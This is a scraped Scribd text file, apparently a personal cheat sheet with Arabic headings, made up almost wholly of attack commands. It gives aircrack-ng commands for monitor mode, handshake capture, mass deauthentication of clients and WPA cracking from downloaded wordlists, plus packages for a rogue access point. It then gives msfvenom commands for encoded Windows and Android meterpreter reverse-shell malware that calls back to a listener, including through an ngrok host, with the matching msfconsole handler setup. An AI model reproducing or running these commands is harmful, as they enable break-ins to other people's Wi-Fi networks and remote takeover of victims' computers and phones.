0% found this document useful (0 votes)
47 views2 pages

Nouveau Document Texte

This document contains instructions and commands for wireless hacking and creating malware using Metasploit. It includes commands for cracking WPA passwords from wordlists, monitoring wireless networks for access points and clients, deauthenticating clients, and creating Windows and Android malware payloads that connect back to a Metasploit handler for control.

Uploaded by

gharbawiabdo5
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
47 views2 pages

Nouveau Document Texte

This document contains instructions and commands for wireless hacking and creating malware using Metasploit. It includes commands for cracking WPA passwords from wordlists, monitoring wireless networks for access points and clients, deauthenticating clients, and creating Windows and Android malware payloads that connect back to a Metasploit handler for control.

Uploaded by

gharbawiabdo5
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

faccccccccccccccccyoutube@rachidRS10

Also you can try this (WiFi related lists):


from here https://wpa-sec.stanev.org
https://wpa-sec.stanev.org/dict/cracked.txt.gz
https://wpa-sec.stanev.org/dict/rkg.txt.gz

or here: https://3wifi.stascorp.com
https://3wifi.stascorp.com/3wifi-dic-2021-06-03.7z
sudo airmon-ng start wlan0
sudo aireplay-ng -9 wlan0
ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
└─# airodump-ng -c 5 -w 3CALA --bssid E8:43:68:59:1C:60 wlan0
aireplay-ng -3 -b macadrrrrrrrrr wlan0
aircrack-ng blaa.cap

/*]]>*/</style>
</b:if>

Aireplay-ng -0 10 -a <mac of access point> name interface


//commands//
sudo airmon-ng start wlan0
sudo airmon-ng check kill
airodump-ng wlan0
sudo aireplay-ng -9 wlan0
sudo airodump-ng -c 10 --bssid 98:48:27:92:A9:1A -w bala wlan0mon
sudo aireplay-ng -0 1 -a 50:D2:F5:78:BA:08 -c C:41:01:16:D2:91 wlan0mon
aireplay-ng --deauth 1000 -a 00:11:22:33:44:55 -c 00:AA:BB:CC:DD:EE wlan0
aircrack-ng -w wordlist.txt -b 50:D2:F5:78:BA:08 bala*.cap

# --- Preparing ---:

apt-get update

apt-get install hostapd dnsmasq apache2

airmon-ng start wlan0

‫فايرو*سات الكمبيوتر‬

‫امر صناعة الفاير*س وتشفيره‬

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp


LHOST=192.168.1.200 LPORT=443 -e x86/shikata_ga_nai -f exe -o /root/Desktop/vi.exe

‫امر تظبيط االعدادات على الميتااسبلويت وتسغيل الفايرس‬

msfconsole -x "use exploit/multi/handler; set PAYLOAD


windows/meterpreter/reverse_tcp; set LHOST 192.168.1.200; set LPORT 443; run; exit
-y"

==================================================================
‫فايروسات االندرو*يد‬

‫امر صناعة الفاي*رس وتشفيره‬

msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.1.200


LPORT=443 -o /root/Desktop/vi.apk
‫امر تظبيط االعدادات على الميتااسبلويت وتسغيل الفاير*س‬

msfconsole -x "use exploit/multi/handler; set PAYLOAD


android/meterpreter/reverse_tcp; set LHOST 192.168.1.200; set LPORT 443; run; exit
-y"

Instructions with commands used with root privileges:


🔧 In VirtualBox settings under Network, select Nat Network
▶ Start Kali Linux
🔧 Open the command-line interface (terminal)
⌨ sudo su
⌨ apt update && apt upgrade
❗ Select 'y' to install
apt install kali-linux_wireless
⌨ apt install realtek-rtl88xxau-dkms
❗ Select 'y' to install
⏹ Poweroff Kali
🔌 Plug in the wifi adapter
🔧 In VirtualBox settings under Ports select USB and enable USB 3.0
🔎 Select plus icon and choose the Wi-Fi adapter from the list (Realtek 802.11n)
▶ Start Kali
🔎 Open the network icon and select your network from the list

Check if you have an IP address in wlan0:


⌨ ifconfig
#example
msfvenom -p android/meterpreter/reverse_tcp LHOST=6.tcp.ngrok.io LPORT=15298 >
/home/user/virus.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 6.tcp.ngrok.io
set LPORT 5544

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy